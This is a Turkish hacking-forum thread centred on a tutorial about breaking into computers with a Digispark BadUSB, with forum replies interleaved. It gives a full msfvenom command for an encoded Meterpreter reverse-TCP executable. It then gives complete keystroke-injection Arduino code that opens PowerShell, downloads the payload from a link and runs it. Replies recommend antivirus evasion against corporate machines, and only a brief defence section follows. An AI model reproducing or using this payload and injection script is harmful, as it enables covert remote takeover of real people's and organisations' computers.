- 20 Şub 2022
- 1,293
- 324
Hocam andorid cihazlar için varmi kof
Digispark BadUSB ile Cihazlara Sızmak 2024
- Konbuyu başlatan MorfiNNN
- Başlangıç tarihi
- 16 Eyl 2018
- 64
- 17
USB'yi Androide takabilirim diyosan var, onun için dönüştürücü lazım o da bende yok ama konusunu açabilirim
Hedef sistem hakkında istihbaratın iyiyse firewall bypass olabilir fakat hedef sistem hakkında istihbaratın yoksa fudlamak daha mantıklı
Android cihazlar için ayrı bir modül var cihaz değişiyor mantık aynı bulup onu da kodlayabilirsiniz ama onu dokunmatiğe göre kodlaman gerek araştırman lazım yabancı kaynaklarda vardır
- 16 Eyl 2018
- 64
- 17
Genel olarak fudlayalım sıkıntı çıkmaz bence bypassla uğraşmadan zaten bu cihazı kullanacağın yerler kurumsal olur onların da sistemleri genelde win7 den winxp ye kadar gidiyor
Kodları var bende fakat usb dönüştürücüden digisparkla da çalışıyor, o dediğiniz cihaz en az 900 TL
Moderatör tarafında düzenlendi:
Eline sağlık 
- 20 Şub 2022
- 1,293
- 324
Link atarmissiniz
- 16 Eyl 2018
- 64
- 17
- 20 Şub 2022
- 1,293
- 324
Pahalı bu biliyorum teşekkürler ama youtube dan baktığımda attiny ile adam payload yüklüyor nasıl oluyor bu
- 16 Eyl 2018
- 64
- 17
USB to TYPE C var onunla yapılabilir
- 20 Şub 2022
- 1,293
- 324
Moderatör tarafında düzenlendi:
- 16 Eyl 2018
- 64
- 17
Normal şekilde metasploitten apk kurmuş bunu digisparkın içine atmış boyutu zaten 7kb falan oluyor digispark max 500kb saklayabiliyor. Normal şekilde otomatik kurulum gerçekleştirmiş. Sonra reverse tcp bağlantısı elde etmiş bundan bahsediyordum ben de.
İnternette aratsan çıkar zaten usb to type c diye
Moderatör tarafında düzenlendi:
- 20 Şub 2022
- 1,293
- 324
Bu ürünün linki varmi
- 16 Eyl 2018
- 64
- 17
Digispark mı yoksa usb to type c dönüştürücü mü çünkü ikisini de internette bulabilirsin.
Acaba daha farklı yapmış olabilir mi
Detaya inersen piyasadaki CD den elektrik üreten tayfaya benzediğini göreceksin ... Eline sağlık güzel bilgilendirme ...1-
2-
3-
Ayrıca ilgili kodlamaları Arduino ile digisparka yükleme ile ilgili 1-2 fotoğraf eklersen daha iyi olurdu ...
- 16 Eyl 2018
- 64
- 17
CD'den elektrik üreten tayfa olayını anlamadım ama teşekkürler. Yükleme ve kütüphane kurulumu için de çoğu yerde videolar ve rehberler bulunuyor, insanlar araştırmayı sevmiyor ama araştırmadan öğrenemezler. Kolaylık olmasın diye özet şekilde anlattım. İlerde kütüphane dosyalarını kurulumlarıyla beraber anlatmayı düşünüyorum.Acaba daha farklı yapmış olabilir mi
Ayrıca ilgili kodlamaları Arduino ile digisparka yükleme ile ilgili 1-2 fotoğraf eklersen daha iyi olurdu ...
- 20 Şub 2022
- 1,293
- 324
Attığım videodaki adamın kullandığı cihaz usb to type c var bende ztn
- 16 Eyl 2018
- 64
- 17
Digispark'ı da aynı şekil internetten bulabilirsin.
güzel konu attiny kodu her sürüme uyumlu mu ? eline sağlıkGünümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.
Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.
- MSFVenom -Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz
Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe
Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.
Digispark:Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.
ATtiny85:ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.
BadUSB:BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.
Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.
Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.
#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}
Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.
Bundan korunmanın yolu var mı?
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.
- USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
- USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
- Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
İyi forumlar.
verebilirmisiniz rica etsem kodları
Moderatör tarafında düzenlendi:
- 13 Tem 2022
- 899
- 701
android cihazlarda önceden cihaz modeli hakkında bilgin yoksa zor.
Hangi harflere basacağını, ekranın neresine tıklayacağını, cihazın ne kadar hızlı indirme yapabileceğini, veya o sırada başka bir pop-up belirip belirmeyeceğini herşeyi kusursuz bir şekilde bilmen gerekiyor. ekran çözünürlüğü, butonların yerleri, hangi tarayıcıyı kullandığına kadar her şey kusursuz ve eksiksiz olarak bilinmeli,
yoksa BadUSB yanlış bir yere tıkladığı anda, veya telefon 2 saniyeliğine donduğu zaman badUSB bunu bilmeyeceği için sağa sola tıklamaya devam eder ve saldırı çöp olur. o yüzden android cihazlarda gerçek dünya senaryolarında geçersiz bir saldırı türü. Ama windows makinelerde kolay, win+r > payload > enter bu kadar.
